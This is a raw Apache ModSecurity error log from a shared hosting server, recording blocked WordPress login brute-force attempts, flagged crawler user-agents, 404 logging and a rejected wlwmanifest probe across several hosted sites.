[Tue May 26 17:52:17.204614 2026] [security2:error] [pid 937900:tid 937983] [remote 31.24.44.107:36968] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.44.24.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-login.php"] [unique_id "ahWQeU4hPNS8CpkGLtbadwAA1VI"]
[Tue May 26 17:52:18.273476 2026] [security2:error] [pid 937900:tid 938043] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQeU4hPNS8CpkGLtbajQAAAJI"]
[Tue May 26 17:52:21.008740 2026] [security2:error] [pid 937900:tid 938077] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQfE4hPNS8CpkGLtba5QAAALQ"]
[Tue May 26 17:52:21.414838 2026] [security2:error] [pid 937900:tid 938020] [remote 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQfU4hPNS8CpkGLtbbCwAA5nc"], referer: https://ndequipments.com/listings/2017-kubota-grand-l3560-loader-backhoe-4-in-1-bucket-package/
[Tue May 26 17:52:21.417328 2026] [security2:error] [pid 937900:tid 938151] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQfU4hPNS8CpkGLtbbBgAA_nU"], referer: https://ndequipments.com/listings/2017-kubota-grand-l3560-loader-backhoe-4-in-1-bucket-package/
[Tue May 26 17:52:21.417676 2026] [security2:error] [pid 937900:tid 938069] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQfU4hPNS8CpkGLtbbDAAArHk"], referer: https://ndequipments.com/listings/2017-kubota-grand-l3560-loader-backhoe-4-in-1-bucket-package/
[Tue May 26 17:52:21.419514 2026] [security2:error] [pid 937900:tid 938041] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQfU4hPNS8CpkGLtbbDgAAkHY"], referer: https://ndequipments.com/listings/2017-kubota-grand-l3560-loader-backhoe-4-in-1-bucket-package/
[Tue May 26 17:52:21.421866 2026] [security2:error] [pid 937900:tid 938152] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQfU4hPNS8CpkGLtbbEwAA_xc"], referer: https://ndequipments.com/listings/2017-kubota-grand-l3560-loader-backhoe-4-in-1-bucket-package/
[Tue May 26 17:52:21.423833 2026] [security2:error] [pid 937900:tid 938150] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQfU4hPNS8CpkGLtbbEAAA_QE"], referer: https://ndequipments.com/listings/2017-kubota-grand-l3560-loader-backhoe-4-in-1-bucket-package/
[Tue May 26 17:52:21.431418 2026] [security2:error] [pid 937900:tid 938101] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQfU4hPNS8CpkGLtbbCAAAzDE"], referer: https://ndequipments.com/listings/2017-kubota-grand-l3560-loader-backhoe-4-in-1-bucket-package/
[Tue May 26 17:52:21.431557 2026] [security2:error] [pid 937900:tid 938116] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQfU4hPNS8CpkGLtbbCQAA23o"], referer: https://ndequipments.com/listings/2017-kubota-grand-l3560-loader-backhoe-4-in-1-bucket-package/
[Tue May 26 17:52:21.431765 2026] [security2:error] [pid 937900:tid 938104] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQfU4hPNS8CpkGLtbbFQAAz2Y"], referer: https://ndequipments.com/listings/2017-kubota-grand-l3560-loader-backhoe-4-in-1-bucket-package/
[Tue May 26 17:52:21.433282 2026] [security2:error] [pid 937900:tid 938097] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQfU4hPNS8CpkGLtbbGAAAyC4"], referer: https://ndequipments.com/listings/2017-kubota-grand-l3560-loader-backhoe-4-in-1-bucket-package/
[Tue May 26 17:52:21.436757 2026] [security2:error] [pid 937900:tid 938042] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQfU4hPNS8CpkGLtbbCgAAkWM"], referer: https://ndequipments.com/listings/2017-kubota-grand-l3560-loader-backhoe-4-in-1-bucket-package/
[Tue May 26 17:52:21.439943 2026] [security2:error] [pid 937900:tid 938144] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQfU4hPNS8CpkGLtbbEQAA92c"], referer: https://ndequipments.com/listings/2017-kubota-grand-l3560-loader-backhoe-4-in-1-bucket-package/
[Tue May 26 17:52:21.443514 2026] [security2:error] [pid 937900:tid 938090] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQfU4hPNS8CpkGLtbbFAAAwQo"], referer: https://ndequipments.com/listings/2017-kubota-grand-l3560-loader-backhoe-4-in-1-bucket-package/
[Tue May 26 17:52:21.448977 2026] [security2:error] [pid 937900:tid 938040] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQfU4hPNS8CpkGLtbbFgAAj3w"], referer: https://ndequipments.com/listings/2017-kubota-grand-l3560-loader-backhoe-4-in-1-bucket-package/
[Tue May 26 17:52:21.450130 2026] [security2:error] [pid 937900:tid 938058] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQfU4hPNS8CpkGLtbbHQAAoQA"], referer: https://ndequipments.com/listings/2017-kubota-grand-l3560-loader-backhoe-4-in-1-bucket-package/
[Tue May 26 17:52:21.450711 2026] [security2:error] [pid 937900:tid 938076] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQfU4hPNS8CpkGLtbbDQAAsz0"], referer: https://ndequipments.com/listings/2017-kubota-grand-l3560-loader-backhoe-4-in-1-bucket-package/
[Tue May 26 17:52:21.453332 2026] [security2:error] [pid 937900:tid 938099] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQfU4hPNS8CpkGLtbbGwAAyig"], referer: https://ndequipments.com/listings/2017-kubota-grand-l3560-loader-backhoe-4-in-1-bucket-package/
[Tue May 26 17:52:21.454470 2026] [security2:error] [pid 937900:tid 938033] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQfU4hPNS8CpkGLtbbBwAAiHg"], referer: https://ndequipments.com/listings/2017-kubota-grand-l3560-loader-backhoe-4-in-1-bucket-package/
[Tue May 26 17:52:21.456222 2026] [security2:error] [pid 937900:tid 938120] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQfU4hPNS8CpkGLtbbGQAA32U"], referer: https://ndequipments.com/listings/2017-kubota-grand-l3560-loader-backhoe-4-in-1-bucket-package/
[Tue May 26 17:52:21.456351 2026] [security2:error] [pid 937900:tid 938155] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQfU4hPNS8CpkGLtbbEgABAn0"], referer: https://ndequipments.com/listings/2017-kubota-grand-l3560-loader-backhoe-4-in-1-bucket-package/
[Tue May 26 17:52:21.457239 2026] [security2:error] [pid 937900:tid 938154] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQfU4hPNS8CpkGLtbbFwABAWA"], referer: https://ndequipments.com/listings/2017-kubota-grand-l3560-loader-backhoe-4-in-1-bucket-package/
[Tue May 26 17:52:21.458611 2026] [security2:error] [pid 937900:tid 938145] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQfU4hPNS8CpkGLtbbHAAA-Hs"], referer: https://ndequipments.com/listings/2017-kubota-grand-l3560-loader-backhoe-4-in-1-bucket-package/
[Tue May 26 17:52:21.459586 2026] [security2:error] [pid 937900:tid 938110] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQfU4hPNS8CpkGLtbbGgAA1V0"], referer: https://ndequipments.com/listings/2017-kubota-grand-l3560-loader-backhoe-4-in-1-bucket-package/
[Tue May 26 17:52:21.463121 2026] [security2:error] [pid 937900:tid 938112] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQfU4hPNS8CpkGLtbbHgAA12k"], referer: https://ndequipments.com/listings/2017-kubota-grand-l3560-loader-backhoe-4-in-1-bucket-package/
[Tue May 26 17:52:21.520999 2026] [security2:error] [pid 937900:tid 938088] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQfU4hPNS8CpkGLtbbHwAAvzo"], referer: https://ndequipments.com/listings/2017-kubota-grand-l3560-loader-backhoe-4-in-1-bucket-package/
[Tue May 26 17:52:21.526464 2026] [security2:error] [pid 937900:tid 938149] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQfU4hPNS8CpkGLtbbIAAA_Ak"], referer: https://ndequipments.com/listings/2017-kubota-grand-l3560-loader-backhoe-4-in-1-bucket-package/
[Tue May 26 17:52:21.542732 2026] [security2:error] [pid 937900:tid 938136] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQfU4hPNS8CpkGLtbbJAAA738"], referer: https://ndequipments.com/listings/2017-kubota-grand-l3560-loader-backhoe-4-in-1-bucket-package/
[Tue May 26 17:52:21.556155 2026] [security2:error] [pid 937900:tid 938125] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQfU4hPNS8CpkGLtbbJQAA5Dc"], referer: https://ndequipments.com/listings/2017-kubota-grand-l3560-loader-backhoe-4-in-1-bucket-package/
[Tue May 26 17:52:21.565795 2026] [security2:error] [pid 937900:tid 938141] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQfU4hPNS8CpkGLtbbJgAA9Go"], referer: https://ndequipments.com/listings/2017-kubota-grand-l3560-loader-backhoe-4-in-1-bucket-package/
[Tue May 26 17:52:21.938809 2026] [security2:error] [pid 937900:tid 937903] [remote 65.1.132.161:21279] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 161.132.1.65.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWQfU4hPNS8CpkGLtbbLQAAwQI"]
[Tue May 26 17:52:22.754321 2026] [security2:error] [pid 937900:tid 938084] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQfk4hPNS8CpkGLtbbPwAAALs"]
[Tue May 26 17:52:23.209574 2026] [security2:error] [pid 937900:tid 937958] [remote 103.95.119.103:50954] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWQf04hPNS8CpkGLtbbUQAA6Tk"]
[Tue May 26 17:52:24.650551 2026] [security2:error] [pid 937900:tid 938122] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQgE4hPNS8CpkGLtbbaQAAAOE"]
[Tue May 26 17:52:26.535431 2026] [security2:error] [pid 937900:tid 938065] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "atreegroup.com"] [uri "/index.php"] [unique_id "ahWQgE4hPNS8CpkGLtbbfAAAAKg"]
[Tue May 26 17:52:26.863885 2026] [security2:error] [pid 937900:tid 938142] [client 179.1.234.77:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQgk4hPNS8CpkGLtbbowAAAPU"]
[Tue May 26 17:52:27.387678 2026] [security2:error] [pid 937900:tid 938097] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQgk4hPNS8CpkGLtbbsAAAAMg"]
[Tue May 26 17:52:29.307305 2026] [security2:error] [pid 937900:tid 938088] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQhE4hPNS8CpkGLtbb5AAAAL8"]
[Tue May 26 17:52:30.268501 2026] [security2:error] [pid 937900:tid 938112] [client 74.7.228.41:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "virgence.com"] [uri "/robots.txt"] [unique_id "ahWQhk4hPNS8CpkGLtbcAwAAANc"]
[Tue May 26 17:52:30.269065 2026] [security2:error] [pid 937900:tid 938141] [client 74.7.228.41:55544] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "virgence.com"] [uri "/robots.txt"] [unique_id "ahWQhk4hPNS8CpkGLtbcAAAA9E0"]
[Tue May 26 17:52:31.543114 2026] [security2:error] [pid 937900:tid 938107] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQh04hPNS8CpkGLtbcFwAAANI"]
[Tue May 26 17:52:33.806892 2026] [security2:error] [pid 937900:tid 937963] [remote 91.210.171.209:39140] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.171.210.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahWQiU4hPNS8CpkGLtbcWQAAmz4"]
[Tue May 26 17:52:35.393037 2026] [security2:error] [pid 937900:tid 938058] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQik4hPNS8CpkGLtbcdgAAAKE"]
[Tue May 26 17:52:36.768030 2026] [security2:error] [pid 937900:tid 938157] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQjE4hPNS8CpkGLtbcnwAAAQQ"]
[Tue May 26 17:52:38.971005 2026] [security2:error] [pid 937900:tid 938115] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQjk4hPNS8CpkGLtbc0AAAANo"]
[Tue May 26 17:52:40.025870 2026] [security2:error] [pid 937900:tid 938152] [client 85.208.96.211:28926] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/summer-kids-camp/list/"] [unique_id "ahWQkE4hPNS8CpkGLtbc9QAAAP8"]
[Tue May 26 17:52:40.026043 2026] [security2:error] [pid 937900:tid 938152] [client 85.208.96.211:28926] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/summer-kids-camp/list/"] [unique_id "ahWQkE4hPNS8CpkGLtbc9QAAAP8"]
[Tue May 26 17:52:40.211854 2026] [security2:error] [pid 937900:tid 937972] [remote 47.128.47.127:33012] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "cicodev.org"] [uri "/programme-securite-alimentaire-et-nutritionnelle-accaparement-des-terres/"] [unique_id "ahWQkE4hPNS8CpkGLtbc_QAAzEc"]
[Tue May 26 17:52:40.608719 2026] [security2:error] [pid 937900:tid 938145] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQkE4hPNS8CpkGLtbc_AAAAPg"]
[Tue May 26 17:52:42.559638 2026] [security2:error] [pid 937900:tid 938067] [client 74.7.230.22:54008] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.dimcorp.jhonweb.com"] [uri "/robots.txt"] [unique_id "ahWQkk4hPNS8CpkGLtbdMwAAqj8"]
[Tue May 26 17:52:43.272720 2026] [security2:error] [pid 937900:tid 938043] [client 74.7.175.134:58228] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.dimensioncorporativa.jhonweb.com"] [uri "/index.php"] [unique_id "ahWQkk4hPNS8CpkGLtbdOAAAkls"]
[Tue May 26 17:52:43.633279 2026] [security2:error] [pid 937900:tid 938130] [client 74.7.228.10:43062] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "dimensioncorporativa.com.co"] [uri "/index.php"] [unique_id "ahWQk04hPNS8CpkGLtbdTwAA6RM"]
[Tue May 26 17:52:43.634740 2026] [security2:error] [pid 937900:tid 938108] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQk04hPNS8CpkGLtbdSAAAANM"]
[Tue May 26 17:52:45.549463 2026] [security2:error] [pid 937900:tid 938067] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQlU4hPNS8CpkGLtbddAAAAKo"]
[Tue May 26 17:52:45.824350 2026] [autoindex:error] [pid 937900:tid 938123] [client 103.108.58.177:3222] AH01276: Cannot serve directory /home2/whitece9/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:52:48.391105 2026] [security2:error] [pid 937900:tid 938077] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQl04hPNS8CpkGLtbdtQAAALQ"]
[Tue May 26 17:52:50.967968 2026] [security2:error] [pid 937900:tid 938124] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQmk4hPNS8CpkGLtbd9QAAAOM"]
[Tue May 26 17:52:53.205424 2026] [security2:error] [pid 937900:tid 938129] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQnE4hPNS8CpkGLtbeJgAAAOg"]
[Tue May 26 17:52:54.421747 2026] [security2:error] [pid 937900:tid 938117] [client 34.41.98.139:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "consultrgb.com"] [uri "/site/index.php"] [unique_id "ahWQnk4hPNS8CpkGLtbeUgAAANw"]
[Tue May 26 17:52:55.211727 2026] [security2:error] [pid 937900:tid 938149] [client 34.41.98.139:56905] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "consultrgb.com"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahWQn04hPNS8CpkGLtbedgAAAPw"]
